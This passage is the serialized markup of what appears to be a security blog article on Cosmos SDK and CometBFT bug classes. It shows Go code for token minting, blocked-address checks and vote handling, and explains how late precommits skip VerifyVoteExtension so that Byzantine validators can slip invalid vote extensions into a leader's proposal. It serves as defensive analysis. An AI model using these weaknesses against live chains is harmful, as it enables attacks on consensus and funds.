%w\"",{"type":27,"tag":207,"props":89476,"children":89477},{"style":238},[89478],{"type":33,"value":1123},{"type":27,"tag":207,"props":89480,"children":89481},{"style":220},[89482],{"type":33,"value":55659},{"type":27,"tag":207,"props":89484,"children":89485},{"style":238},[89486],{"type":33,"value":10449},{"type":27,"tag":207,"props":89488,"children":89489},{"class":209,"line":7917},[89490],{"type":27,"tag":207,"props":89491,"children":89492},{"style":238},[89493],{"type":33,"value":10637},{"type":27,"tag":207,"props":89495,"children":89496},{"class":209,"line":7926},[89497],{"type":27,"tag":207,"props":89498,"children":89499},{"emptyLinePlaceholder":19},[89500],{"type":33,"value":2062},{"type":27,"tag":207,"props":89502,"children":89503},{"class":209,"line":7934},[89504,89508,89513,89517,89522,89526,89530,89534,89539,89543,89548],{"type":27,"tag":207,"props":89505,"children":89506},{"style":376},[89507],{"type":33,"value":10562},{"type":27,"tag":207,"props":89509,"children":89510},{"style":220},[89511],{"type":33,"value":89512}," bytes",{"type":27,"tag":207,"props":89514,"children":89515},{"style":238},[89516],{"type":33,"value":1041},{"type":27,"tag":207,"props":89518,"children":89519},{"style":1335},[89520],{"type":33,"value":89521},"Equal",{"type":27,"tag":207,"props":89523,"children":89524},{"style":238},[89525],{"type":33,"value":1343},{"type":27,"tag":207,"props":89527,"children":89528},{"style":220},[89529],{"type":33,"value":89351},{"type":27,"tag":207,"props":89531,"children":89532},{"style":238},[89533],{"type":33,"value":1041},{"type":27,"tag":207,"props":89535,"children":89536},{"style":1335},[89537],{"type":33,"value":89538},"TokenBytes",{"type":27,"tag":207,"props":89540,"children":89541},{"style":238},[89542],{"type":33,"value":25646},{"type":27,"tag":207,"props":89544,"children":89545},{"style":220},[89546],{"type":33,"value":89547},"sourceBTCToken",{"type":27,"tag":207,"props":89549,"children":89550},{"style":238},[89551],{"type":33,"value":1424},{"type":27,"tag":207,"props":89553,"children":89554},{"class":209,"line":7943},[89555,89560,89564,89568,89572,89577,89581,89585,89589,89593,89597,89601,89605,89609],{"type":27,"tag":207,"props":89556,"children":89557},{"style":220},[89558],{"type":33,"value":89559}," err",{"type":27,"tag":207,"props":89561,"children":89562},{"style":226},[89563],{"type":33,"value":229},{"type":27,"tag":207,"props":89565,"children":89566},{"style":220},[89567],{"type":33,"value":88479},{"type":27,"tag":207,"props":89569,"children":89570},{"style":238},[89571],{"type":33,"value":1041},{"type":27,"tag":207,"props":89573,"children":89574},{"style":1335},[89575],{"type":33,"value":89576},"mintBTC",{"type":27,"tag":207,"props":89578,"children":89579},{"style":238},[89580],{"type":33,"value":1343},{"type":27,"tag":207,"props":89582,"children":89583},{"style":220},[89584],{"type":33,"value":27552},{"type":27,"tag":207,"props":89586,"children":89587},{"style":238},[89588],{"type":33,"value":1123},{"type":27,"tag":207,"props":89590,"children":89591},{"style":220},[89592],{"type":33,"value":88874},{"type":27,"tag":207,"props":89594,"children":89595},{"style":238},[89596],{"type":33,"value":1123},{"type":27,"tag":207,"props":89598,"children":89599},{"style":220},[89600],{"type":33,"value":89351},{"type":27,"tag":207,"props":89602,"children":89603},{"style":238},[89604],{"type":33,"value":1041},{"type":27,"tag":207,"props":89606,"children":89607},{"style":220},[89608],{"type":33,"value":86286},{"type":27,"tag":207,"props":89610,"children":89611},{"style":238},[89612],{"type":33,"value":10449},{"type":27,"tag":207,"props":89614,"children":89615},{"class":209,"line":7952},[89616,89620,89624,89628,89632],{"type":27,"tag":207,"props":89617,"children":89618},{"style":376},[89619],{"type":33,"value":66034},{"type":27,"tag":207,"props":89621,"children":89622},{"style":220},[89623],{"type":33,"value":55760},{"type":27,"tag":207,"props":89625,"children":89626},{"style":226},[89627],{"type":33,"value":71619},{"type":27,"tag":207,"props":89629,"children":89630},{"style":214},[89631],{"type":33,"value":89141},{"type":27,"tag":207,"props":89633,"children":89634},{"style":238},[89635],{"type":33,"value":384},{"type":27,"tag":207,"props":89637,"children":89638},{"class":209,"line":7961},[89639,89643,89647,89651,89655],{"type":27,"tag":207,"props":89640,"children":89641},{"style":376},[89642],{"type":33,"value":67960},{"type":27,"tag":207,"props":89644,"children":89645},{"style":220},[89646],{"type":33,"value":89457},{"type":27,"tag":207,"props":89648,"children":89649},{"style":238},[89650],{"type":33,"value":1041},{"type":27,"tag":207,"props":89652,"children":89653},{"style":1335},[89654],{"type":33,"value":89174},{"type":27,"tag":207,"props":89656,"children":89657},{"style":238},[89658],{"type":33,"value":9090},{"type":27,"tag":207,"props":89660,"children":89661},{"class":209,"line":7969},[89662,89667],{"type":27,"tag":207,"props":89663,"children":89664},{"style":1325},[89665],{"type":33,"value":89666}," \"failed to mint BTC for event %v: %w\"",{"type":27,"tag":207,"props":89668,"children":89669},{"style":238},[89670],{"type":33,"value":1842},{"type":27,"tag":207,"props":89672,"children":89673},{"class":209,"line":7978},[89674,89679,89683,89688],{"type":27,"tag":207,"props":89675,"children":89676},{"style":220},[89677],{"type":33,"value":89678}," event",{"type":27,"tag":207,"props":89680,"children":89681},{"style":238},[89682],{"type":33,"value":1041},{"type":27,"tag":207,"props":89684,"children":89685},{"style":220},[89686],{"type":33,"value":89687},"Sequence",{"type":27,"tag":207,"props":89689,"children":89690},{"style":238},[89691],{"type":33,"value":1842},{"type":27,"tag":207,"props":89693,"children":89694},{"class":209,"line":7987},[89695,89700],{"type":27,"tag":207,"props":89696,"children":89697},{"style":220},[89698],{"type":33,"value":89699}," err",{"type":27,"tag":207,"props":89701,"children":89702},{"style":238},[89703],{"type":33,"value":1842},{"type":27,"tag":207,"props":89705,"children":89706},{"class":209,"line":7996},[89707],{"type":27,"tag":207,"props":89708,"children":89709},{"style":238},[89710],{"type":33,"value":89711}," )\n",{"type":27,"tag":207,"props":89713,"children":89714},{"class":209,"line":8005},[89715],{"type":27,"tag":207,"props":89716,"children":89717},{"style":238},[89718],{"type":33,"value":66118},{"type":27,"tag":207,"props":89720,"children":89721},{"class":209,"line":8013},[89722,89726,89730],{"type":27,"tag":207,"props":89723,"children":89724},{"style":238},[89725],{"type":33,"value":10600},{"type":27,"tag":207,"props":89727,"children":89728},{"style":376},[89729],{"type":33,"value":10605},{"type":27,"tag":207,"props":89731,"children":89732},{"style":238},[89733],{"type":33,"value":384},{"type":27,"tag":207,"props":89735,"children":89736},{"class":209,"line":8021},[89737],{"type":27,"tag":207,"props":89738,"children":89739},{"style":226},[89740],{"type":33,"value":89741}," ...\n",{"type":27,"tag":207,"props":89743,"children":89744},{"class":209,"line":8029},[89745],{"type":27,"tag":207,"props":89746,"children":89747},{"style":238},[89748],{"type":33,"value":10637},{"type":27,"tag":207,"props":89750,"children":89751},{"class":209,"line":8037},[89752],{"type":27,"tag":207,"props":89753,"children":89754},{"style":238},[89755],{"type":33,"value":10645},{"type":27,"tag":207,"props":89757,"children":89758},{"class":209,"line":8046},[89759],{"type":27,"tag":207,"props":89760,"children":89761},{"style":226},[89762],{"type":33,"value":27611},{"type":27,"tag":207,"props":89764,"children":89765},{"class":209,"line":8055},[89766],{"type":27,"tag":207,"props":89767,"children":89768},{"style":238},[89769],{"type":33,"value":451},{"type":27,"tag":207,"props":89771,"children":89772},{"class":209,"line":8064},[89773],{"type":27,"tag":207,"props":89774,"children":89775},{"emptyLinePlaceholder":19},[89776],{"type":33,"value":2062},{"type":27,"tag":207,"props":89778,"children":89779},{"class":209,"line":8072},[89780,89784,89788,89792,89796,89800,89804],{"type":27,"tag":207,"props":89781,"children":89782},{"style":214},[89783],{"type":33,"value":2085},{"type":27,"tag":207,"props":89785,"children":89786},{"style":238},[89787],{"type":33,"value":686},{"type":27,"tag":207,"props":89789,"children":89790},{"style":220},[89791],{"type":33,"value":88351},{"type":27,"tag":207,"props":89793,"children":89794},{"style":8920},[89795],{"type":33,"value":87176},{"type":27,"tag":207,"props":89797,"children":89798},{"style":238},[89799],{"type":33,"value":2222},{"type":27,"tag":207,"props":89801,"children":89802},{"style":1335},[89803],{"type":33,"value":89576},{"type":27,"tag":207,"props":89805,"children":89806},{"style":238},[89807],{"type":33,"value":9090},{"type":27,"tag":207,"props":89809,"children":89810},{"class":209,"line":8081},[89811,89815,89819,89823,89827],{"type":27,"tag":207,"props":89812,"children":89813},{"style":220},[89814],{"type":33,"value":27495},{"type":27,"tag":207,"props":89816,"children":89817},{"style":8920},[89818],{"type":33,"value":85872},{"type":27,"tag":207,"props":89820,"children":89821},{"style":238},[89822],{"type":33,"value":1041},{"type":27,"tag":207,"props":89824,"children":89825},{"style":8920},[89826],{"type":33,"value":83581},{"type":27,"tag":207,"props":89828,"children":89829},{"style":238},[89830],{"type":33,"value":1842},{"type":27,"tag":207,"props":89832,"children":89833},{"class":209,"line":8090},[89834,89839,89843,89847,89852],{"type":27,"tag":207,"props":89835,"children":89836},{"style":220},[89837],{"type":33,"value":89838}," recipient",{"type":27,"tag":207,"props":89840,"children":89841},{"style":8920},[89842],{"type":33,"value":85872},{"type":27,"tag":207,"props":89844,"children":89845},{"style":238},[89846],{"type":33,"value":1041},{"type":27,"tag":207,"props":89848,"children":89849},{"style":8920},[89850],{"type":33,"value":89851},"AccAddress",{"type":27,"tag":207,"props":89853,"children":89854},{"style":238},[89855],{"type":33,"value":1842},{"type":27,"tag":207,"props":89857,"children":89858},{"class":209,"line":8098},[89859,89863,89868,89872,89877],{"type":27,"tag":207,"props":89860,"children":89861},{"style":220},[89862],{"type":33,"value":68814},{"type":27,"tag":207,"props":89864,"children":89865},{"style":8920},[89866],{"type":33,"value":89867}," math",{"type":27,"tag":207,"props":89869,"children":89870},{"style":238},[89871],{"type":33,"value":1041},{"type":27,"tag":207,"props":89873,"children":89874},{"style":8920},[89875],{"type":33,"value":89876},"Int",{"type":27,"tag":207,"props":89878,"children":89879},{"style":238},[89880],{"type":33,"value":1842},{"type":27,"tag":207,"props":89882,"children":89883},{"class":209,"line":8107},[89884,89888,89892],{"type":27,"tag":207,"props":89885,"children":89886},{"style":238},[89887],{"type":33,"value":2222},{"type":27,"tag":207,"props":89889,"children":89890},{"style":8920},[89891],{"type":33,"value":22138},{"type":27,"tag":207,"props":89893,"children":89894},{"style":238},[89895],{"type":33,"value":384},{"type":27,"tag":207,"props":89897,"children":89898},{"class":209,"line":8116},[89899],{"type":27,"tag":207,"props":89900,"children":89901},{"style":226},[89902],{"type":33,"value":27611},{"type":27,"tag":207,"props":89904,"children":89905},{"class":209,"line":8125},[89906,89911,89915,89919,89923,89928,89932,89936],{"type":27,"tag":207,"props":89907,"children":89908},{"style":220},[89909],{"type":33,"value":89910}," err",{"type":27,"tag":207,"props":89912,"children":89913},{"style":226},[89914],{"type":33,"value":229},{"type":27,"tag":207,"props":89916,"children":89917},{"style":220},[89918],{"type":33,"value":88479},{"type":27,"tag":207,"props":89920,"children":89921},{"style":238},[89922],{"type":33,"value":1041},{"type":27,"tag":207,"props":89924,"children":89925},{"style":220},[89926],{"type":33,"value":89927},"bankKeeper",{"type":27,"tag":207,"props":89929,"children":89930},{"style":238},[89931],{"type":33,"value":1041},{"type":27,"tag":207,"props":89933,"children":89934},{"style":1335},[89935],{"type":33,"value":88866},{"type":27,"tag":207,"props":89937,"children":89938},{"style":238},[89939],{"type":33,"value":9090},{"type":27,"tag":207,"props":89941,"children":89942},{"class":209,"line":8133},[89943,89947],{"type":27,"tag":207,"props":89944,"children":89945},{"style":220},[89946],{"type":33,"value":33451},{"type":27,"tag":207,"props":89948,"children":89949},{"style":238},[89950],{"type":33,"value":1842},{"type":27,"tag":207,"props":89952,"children":89953},{"class":209,"line":8142},[89954,89959,89963,89968],{"type":27,"tag":207,"props":89955,"children":89956},{"style":220},[89957],{"type":33,"value":89958}," types",{"type":27,"tag":207,"props":89960,"children":89961},{"style":238},[89962],{"type":33,"value":1041},{"type":27,"tag":207,"props":89964,"children":89965},{"style":220},[89966],{"type":33,"value":89967},"ModuleName",{"type":27,"tag":207,"props":89969,"children":89970},{"style":238},[89971],{"type":33,"value":1842},{"type":27,"tag":207,"props":89973,"children":89974},{"class":209,"line":8151},[89975,89979],{"type":27,"tag":207,"props":89976,"children":89977},{"style":220},[89978],{"type":33,"value":89376},{"type":27,"tag":207,"props":89980,"children":89981},{"style":238},[89982],{"type":33,"value":1842},{"type":27,"tag":207,"props":89984,"children":89985},{"class":209,"line":8160},[89986,89991],{"type":27,"tag":207,"props":89987,"children":89988},{"style":220},[89989],{"type":33,"value":89990}," coins",{"type":27,"tag":207,"props":89992,"children":89993},{"style":238},[89994],{"type":33,"value":1842},{"type":27,"tag":207,"props":89996,"children":89997},{"class":209,"line":8169},[89998],{"type":27,"tag":207,"props":89999,"children":90000},{"style":238},[90001],{"type":33,"value":31184},{"type":27,"tag":207,"props":90003,"children":90004},{"class":209,"line":8177},[90005,90009,90013,90017,90021],{"type":27,"tag":207,"props":90006,"children":90007},{"style":376},[90008],{"type":33,"value":19556},{"type":27,"tag":207,"props":90010,"children":90011},{"style":220},[90012],{"type":33,"value":55760},{"type":27,"tag":207,"props":90014,"children":90015},{"style":226},[90016],{"type":33,"value":71619},{"type":27,"tag":207,"props":90018,"children":90019},{"style":214},[90020],{"type":33,"value":89141},{"type":27,"tag":207,"props":90022,"children":90023},{"style":238},[90024],{"type":33,"value":384},{"type":27,"tag":207,"props":90026,"children":90027},{"class":209,"line":8185},[90028,90032,90036,90040,90044,90048,90053,90057,90061],{"type":27,"tag":207,"props":90029,"children":90030},{"style":376},[90031],{"type":33,"value":23019},{"type":27,"tag":207,"props":90033,"children":90034},{"style":220},[90035],{"type":33,"value":89457},{"type":27,"tag":207,"props":90037,"children":90038},{"style":238},[90039],{"type":33,"value":1041},{"type":27,"tag":207,"props":90041,"children":90042},{"style":1335},[90043],{"type":33,"value":89174},{"type":27,"tag":207,"props":90045,"children":90046},{"style":238},[90047],{"type":33,"value":1343},{"type":27,"tag":207,"props":90049,"children":90050},{"style":1325},[90051],{"type":33,"value":90052},"\"failed to send coins: %w\"",{"type":27,"tag":207,"props":90054,"children":90055},{"style":238},[90056],{"type":33,"value":1123},{"type":27,"tag":207,"props":90058,"children":90059},{"style":220},[90060],{"type":33,"value":55659},{"type":27,"tag":207,"props":90062,"children":90063},{"style":238},[90064],{"type":33,"value":10449},{"type":27,"tag":207,"props":90066,"children":90067},{"class":209,"line":8194},[90068],{"type":27,"tag":207,"props":90069,"children":90070},{"style":238},[90071],{"type":33,"value":10645},{"type":27,"tag":207,"props":90073,"children":90074},{"class":209,"line":9933},[90075],{"type":27,"tag":207,"props":90076,"children":90077},{"style":226},[90078],{"type":33,"value":27611},{"type":27,"tag":207,"props":90080,"children":90081},{"class":209,"line":9941},[90082],{"type":27,"tag":207,"props":90083,"children":90084},{"style":238},[90085],{"type":33,"value":451},{"type":27,"tag":101,"props":90087,"children":90089},{"code":90088,"language":83397,"meta":7,"className":83398,"style":7},"func (k BaseKeeper) SendCoinsFromModuleToAccount(\n ctx context.Context, senderModule string, recipientAddr sdk.AccAddress, amt sdk.Coins,\n) error {\n ...\n if k.BlockedAddr(recipientAddr) {\n return errorsmod.Wrapf(sdkerrors.ErrUnauthorized, \"%s is not allowed to receive funds\", recipientAddr)\n }\n ...\n}\n",[90090],{"type":27,"tag":84,"props":90091,"children":90092},{"__ignoreMap":7},[90093,90125,90204,90219,90227,90258,90316,90323,90330],{"type":27,"tag":207,"props":90094,"children":90095},{"class":209,"line":210},[90096,90100,90104,90108,90113,90117,90121],{"type":27,"tag":207,"props":90097,"children":90098},{"style":214},[90099],{"type":33,"value":2085},{"type":27,"tag":207,"props":90101,"children":90102},{"style":238},[90103],{"type":33,"value":686},{"type":27,"tag":207,"props":90105,"children":90106},{"style":220},[90107],{"type":33,"value":88351},{"type":27,"tag":207,"props":90109,"children":90110},{"style":8920},[90111],{"type":33,"value":90112},"BaseKeeper",{"type":27,"tag":207,"props":90114,"children":90115},{"style":238},[90116],{"type":33,"value":2222},{"type":27,"tag":207,"props":90118,"children":90119},{"style":1335},[90120],{"type":33,"value":88866},{"type":27,"tag":207,"props":90122,"children":90123},{"style":238},[90124],{"type":33,"value":9090},{"type":27,"tag":207,"props":90126,"children":90127},{"class":209,"line":244},[90128,90132,90136,90140,90144,90148,90153,90157,90161,90166,90170,90174,90178,90182,90187,90191,90195,90200],{"type":27,"tag":207,"props":90129,"children":90130},{"style":220},[90131],{"type":33,"value":33108},{"type":27,"tag":207,"props":90133,"children":90134},{"style":8920},[90135],{"type":33,"value":83572},{"type":27,"tag":207,"props":90137,"children":90138},{"style":238},[90139],{"type":33,"value":1041},{"type":27,"tag":207,"props":90141,"children":90142},{"style":8920},[90143],{"type":33,"value":83581},{"type":27,"tag":207,"props":90145,"children":90146},{"style":238},[90147],{"type":33,"value":1123},{"type":27,"tag":207,"props":90149,"children":90150},{"style":220},[90151],{"type":33,"value":90152},"senderModule",{"type":27,"tag":207,"props":90154,"children":90155},{"style":8920},[90156],{"type":33,"value":43281},{"type":27,"tag":207,"props":90158,"children":90159},{"style":238},[90160],{"type":33,"value":1123},{"type":27,"tag":207,"props":90162,"children":90163},{"style":220},[90164],{"type":33,"value":90165},"recipientAddr",{"type":27,"tag":207,"props":90167,"children":90168},{"style":8920},[90169],{"type":33,"value":85872},{"type":27,"tag":207,"props":90171,"children":90172},{"style":238},[90173],{"type":33,"value":1041},{"type":27,"tag":207,"props":90175,"children":90176},{"style":8920},[90177],{"type":33,"value":89851},{"type":27,"tag":207,"props":90179,"children":90180},{"style":238},[90181],{"type":33,"value":1123},{"type":27,"tag":207,"props":90183,"children":90184},{"style":220},[90185],{"type":33,"value":90186},"amt",{"type":27,"tag":207,"props":90188,"children":90189},{"style":8920},[90190],{"type":33,"value":85872},{"type":27,"tag":207,"props":90192,"children":90193},{"style":238},[90194],{"type":33,"value":1041},{"type":27,"tag":207,"props":90196,"children":90197},{"style":8920},[90198],{"type":33,"value":90199},"Coins",{"type":27,"tag":207,"props":90201,"children":90202},{"style":238},[90203],{"type":33,"value":1842},{"type":27,"tag":207,"props":90205,"children":90206},{"class":209,"line":270},[90207,90211,90215],{"type":27,"tag":207,"props":90208,"children":90209},{"style":238},[90210],{"type":33,"value":2222},{"type":27,"tag":207,"props":90212,"children":90213},{"style":8920},[90214],{"type":33,"value":22138},{"type":27,"tag":207,"props":90216,"children":90217},{"style":238},[90218],{"type":33,"value":384},{"type":27,"tag":207,"props":90220,"children":90221},{"class":209,"line":296},[90222],{"type":27,"tag":207,"props":90223,"children":90224},{"style":226},[90225],{"type":33,"value":90226}," ...\n",{"type":27,"tag":207,"props":90228,"children":90229},{"class":209,"line":445},[90230,90234,90238,90242,90246,90250,90254],{"type":27,"tag":207,"props":90231,"children":90232},{"style":376},[90233],{"type":33,"value":23063},{"type":27,"tag":207,"props":90235,"children":90236},{"style":220},[90237],{"type":33,"value":88479},{"type":27,"tag":207,"props":90239,"children":90240},{"style":238},[90241],{"type":33,"value":1041},{"type":27,"tag":207,"props":90243,"children":90244},{"style":1335},[90245],{"type":33,"value":88882},{"type":27,"tag":207,"props":90247,"children":90248},{"style":238},[90249],{"type":33,"value":1343},{"type":27,"tag":207,"props":90251,"children":90252},{"style":220},[90253],{"type":33,"value":90165},{"type":27,"tag":207,"props":90255,"children":90256},{"style":238},[90257],{"type":33,"value":1424},{"type":27,"tag":207,"props":90259,"children":90260},{"class":209,"line":867},[90261,90265,90270,90274,90278,90282,90286,90290,90295,90299,90304,90308,90312],{"type":27,"tag":207,"props":90262,"children":90263},{"style":376},[90264],{"type":33,"value":46444},{"type":27,"tag":207,"props":90266,"children":90267},{"style":220},[90268],{"type":33,"value":90269}," errorsmod",{"type":27,"tag":207,"props":90271,"children":90272},{"style":238},[90273],{"type":33,"value":1041},{"type":27,"tag":207,"props":90275,"children":90276},{"style":1335},[90277],{"type":33,"value":88140},{"type":27,"tag":207,"props":90279,"children":90280},{"style":238},[90281],{"type":33,"value":1343},{"type":27,"tag":207,"props":90283,"children":90284},{"style":220},[90285],{"type":33,"value":87802},{"type":27,"tag":207,"props":90287,"children":90288},{"style":238},[90289],{"type":33,"value":1041},{"type":27,"tag":207,"props":90291,"children":90292},{"style":220},[90293],{"type":33,"value":90294},"ErrUnauthorized",{"type":27,"tag":207,"props":90296,"children":90297},{"style":238},[90298],{"type":33,"value":1123},{"type":27,"tag":207,"props":90300,"children":90301},{"style":1325},[90302],{"type":33,"value":90303},"\"%s is not allowed to receive funds\"",{"type":27,"tag":207,"props":90305,"children":90306},{"style":238},[90307],{"type":33,"value":1123},{"type":27,"tag":207,"props":90309,"children":90310},{"style":220},[90311],{"type":33,"value":90165},{"type":27,"tag":207,"props":90313,"children":90314},{"style":238},[90315],{"type":33,"value":10449},{"type":27,"tag":207,"props":90317,"children":90318},{"class":209,"line":892},[90319],{"type":27,"tag":207,"props":90320,"children":90321},{"style":238},[90322],{"type":33,"value":16872},{"type":27,"tag":207,"props":90324,"children":90325},{"class":209,"line":1475},[90326],{"type":27,"tag":207,"props":90327,"children":90328},{"style":226},[90329],{"type":33,"value":90226},{"type":27,"tag":207,"props":90331,"children":90332},{"class":209,"line":2065},[90333],{"type":27,"tag":207,"props":90334,"children":90335},{"style":238},[90336],{"type":33,"value":451},{"type":27,"tag":36,"props":90338,"children":90339},{},[90340,90342,90349],{"type":33,"value":90341},"This shows even well-known bug classes still resurface from time to time due to unforeseen invariant violations. Additional examples include ",{"type":27,"tag":47,"props":90343,"children":90346},{"href":90344,"rel":90345},"https://hackerone.com/reports/3018307",[51],[90347],{"type":33,"value":90348},"improper decimal handling in the group module",{"type":33,"value":1041},{"type":27,"tag":28,"props":90351,"children":90353},{"id":90352},"same-same-but-different",[90354],{"type":33,"value":90355},"Same, Same... But Different",{"type":27,"tag":36,"props":90357,"children":90358},{},[90359,90361,90367,90368,90374,90375,90381,90382,90388],{"type":33,"value":90360},"Cosmos exposes several consensus-level interfaces, such as ",{"type":27,"tag":84,"props":90362,"children":90364},{"className":90363},[],[90365],{"type":33,"value":90366},"PrepareProposal",{"type":33,"value":1123},{"type":27,"tag":84,"props":90369,"children":90371},{"className":90370},[],[90372],{"type":33,"value":90373},"ProcessProposal",{"type":33,"value":1123},{"type":27,"tag":84,"props":90376,"children":90378},{"className":90377},[],[90379],{"type":33,"value":90380},"ExtendVote",{"type":33,"value":4601},{"type":27,"tag":84,"props":90383,"children":90385},{"className":90384},[],[90386],{"type":33,"value":90387},"VerifyVoteExtension",{"type":33,"value":90389},". These ABCI methods allow developers to customize how blocks are constructed, as well as inject supplementary data into each block.",{"type":27,"tag":36,"props":90391,"children":90392},{},[90393],{"type":33,"value":90394},"Two of the best-known attack surfaces are",{"type":27,"tag":12719,"props":90396,"children":90397},{},[90398,90427],{"type":27,"tag":1232,"props":90399,"children":90400},{},[90401,90406,90407,90412,90414,90419,90420,90425],{"type":27,"tag":84,"props":90402,"children":90404},{"className":90403},[],[90405],{"type":33,"value":90366},{"type":33,"value":686},{"type":27,"tag":84,"props":90408,"children":90410},{"className":90409},[],[90411],{"type":33,"value":90380},{"type":33,"value":90413},") outputs being rejected due to ",{"type":27,"tag":84,"props":90415,"children":90417},{"className":90416},[],[90418],{"type":33,"value":90373},{"type":33,"value":686},{"type":27,"tag":84,"props":90421,"children":90423},{"className":90422},[],[90424],{"type":33,"value":90387},{"type":33,"value":90426},") over-validating, resulting in liveness failures.",{"type":27,"tag":1232,"props":90428,"children":90429},{},[90430,90432,90437,90438,90443,90445,90450,90451,90456],{"type":33,"value":90431},"Malicious proposals and vote extensions not created through the ",{"type":27,"tag":84,"props":90433,"children":90435},{"className":90434},[],[90436],{"type":33,"value":90366},{"type":33,"value":686},{"type":27,"tag":84,"props":90439,"children":90441},{"className":90440},[],[90442],{"type":33,"value":90380},{"type":33,"value":90444},") are accepted due to ",{"type":27,"tag":84,"props":90446,"children":90448},{"className":90447},[],[90449],{"type":33,"value":90373},{"type":33,"value":686},{"type":27,"tag":84,"props":90452,"children":90454},{"className":90453},[],[90455],{"type":33,"value":90387},{"type":33,"value":90457},") under-validating.",{"type":27,"tag":36,"props":90459,"children":90460},{},[90461],{"type":33,"value":90462},"In essence, any difference in pairs of handlers will likely lead to security issues.",{"type":27,"tag":36,"props":90464,"children":90465},{},[90466,90468,90474,90476,90481],{"type":33,"value":90467},"There are also a few lesser known variants of these issues. One instance is the validation of ",{"type":27,"tag":84,"props":90469,"children":90471},{"className":90470},[],[90472],{"type":33,"value":90473},"VoteExtensions",{"type":33,"value":90475}," within ",{"type":27,"tag":84,"props":90477,"children":90479},{"className":90478},[],[90480],{"type":33,"value":90366},{"type":33,"value":90482},". To provide context, we start with a primer on the CometBTF consensus and vote extensions.",{"type":27,"tag":36,"props":90484,"children":90485},{},[90486,90488,90493,90495,90500],{"type":33,"value":90487},"Consensus starts with a leader creating a proposal and then broadcasting it to each validator. Validators then proceed to vote on whether or not to accept the proposal. During the voting phase, ",{"type":27,"tag":84,"props":90489,"children":90491},{"className":90490},[],[90492],{"type":33,"value":90380},{"type":33,"value":90494}," is called to attach additional data to the votes. Once a validator collects enough valid votes that pass ",{"type":27,"tag":84,"props":90496,"children":90498},{"className":90497},[],[90499],{"type":33,"value":90387},{"type":33,"value":90501},", a proposal is considered accepted and can be committed. After committing the proposal, a new leader starts to create the next proposal, bringing us back to the point where we started.",{"type":27,"tag":36,"props":90503,"children":90504},{},[90505,90507,90512],{"type":33,"value":90506},"So, where are the attached vote extension data used? It turns out a leader should include the vote extensions of the previous consensus round in its proposal. It might be tempting to conclude that all vote extensions an honest leader accepted have passed the ",{"type":27,"tag":84,"props":90508,"children":90510},{"className":90509},[],[90511],{"type":33,"value":90387},{"type":33,"value":90513}," check and are therefore valid. Thus, we can directly inject all vote extensions into our proposal.",{"type":27,"tag":36,"props":90515,"children":90516},{},[90517,90519,90524,90526,90532],{"type":33,"value":90518},"Unfortunately, CometBTF directly accepts late precommits without passing them through ",{"type":27,"tag":84,"props":90520,"children":90522},{"className":90521},[],[90523],{"type":33,"value":90387},{"type":33,"value":90525},". This exposes a time window where Byzantine validators can smuggle malicious vote into the next leader's cache, luring the leader into including invalid vote extensions into its ",{"type":27,"tag":84,"props":90527,"children":90529},{"className":90528},[],[90530],{"type":33,"value":90531},"Proposal",{"type":33,"value":1041},{"type":27,"tag":101,"props":90534,"children":90536},{"code":90535,"language":83397,"meta":7,"className":83398,"style":7},"func (cs *State) addVote(vote *types.Vote, peerID p2p.ID) (added bool, err error) {\n ...\n\n // A precommit for the previous height?\n // These come in while we wait timeoutCommit\n if vote.Height+1 == cs.Height && vote.Type == types.PrecommitType {\n ...\n // Late precommits are not checked by VerifyVoteExtension\n added, err = cs.LastCommit.AddVote(vote)\n ...\n return added, err\n }\n extEnabled := cs.state.ConsensusParams.Feature.VoteExtensionsEnabled(vote.Height)\n if extEnabled {\n ...\n if vote.Type == types.PrecommitType && !vote.BlockID.IsNil() &&\n !bytes.Equal(vote.ValidatorAddress, myAddr) { // Skip the VerifyVoteExtension call if the vote was issued by this validator.\n ...\n err := cs.blockExec.VerifyVoteExtension(context.TODO(), vote)\n ...\n }\n } else if {\n ...\n }\n ...\n}\n",[90537],{"type":27,"tag":84,"props":90538,"children":90539},{"__ignoreMap":7},[90540,90652,90659,90666,90674,90682,90766,90773,90781,90835,90842,90863,90870,90942,90958,90965,91039,91095,91102,91164,91171,91178,91197,91204,91211,91218],{"type":27,"tag":207,"props":90541,"children":90542},{"class":209,"line":210},[90543,90547,90551,90556,90560,90565,90569,90574,90578,90583,90587,90591,90595,90600,90604,90609,90614,90618,90623,90627,90632,90636,90640,90644,90648],{"type":27,"tag":207,"props":90544,"children":90545},{"style":214},[90546],{"type":33,"value":2085},{"type":27,"tag":207,"props":90548,"children":90549},{"style":238},[90550],{"type":33,"value":686},{"type":27,"tag":207,"props":90552,"children":90553},{"style":220},[90554],{"type":33,"value":90555},"cs ",{"type":27,"tag":207,"props":90557,"children":90558},{"style":226},[90559],{"type":33,"value":9286},{"type":27,"tag":207,"props":90561,"children":90562},{"style":8920},[90563],{"type":33,"value":90564},"State",{"type":27,"tag":207,"props":90566,"children":90567},{"style":238},[90568],{"type":33,"value":2222},{"type":27,"tag":207,"props":90570,"children":90571},{"style":1335},[90572],{"type":33,"value":90573},"addVote",{"type":27,"tag":207,"props":90575,"children":90576},{"style":238},[90577],{"type":33,"value":1343},{"type":27,"tag":207,"props":90579,"children":90580},{"style":220},[90581],{"type":33,"value":90582},"vote",{"type":27,"tag":207,"props":90584,"children":90585},{"style":226},[90586],{"type":33,"value":17093},{"type":27,"tag":207,"props":90588,"children":90589},{"style":8920},[90590],{"type":33,"value":13042},{"type":27,"tag":207,"props":90592,"children":90593},{"style":238},[90594],{"type":33,"value":1041},{"type":27,"tag":207,"props":90596,"children":90597},{"style":8920},[90598],{"type":33,"value":90599},"Vote",{"type":27,"tag":207,"props":90601,"children":90602},{"style":238},[90603],{"type":33,"value":1123},{"type":27,"tag":207,"props":90605,"children":90606},{"style":220},[90607],{"type":33,"value":90608},"peerID",{"type":27,"tag":207,"props":90610,"children":90611},{"style":8920},[90612],{"type":33,"value":90613}," 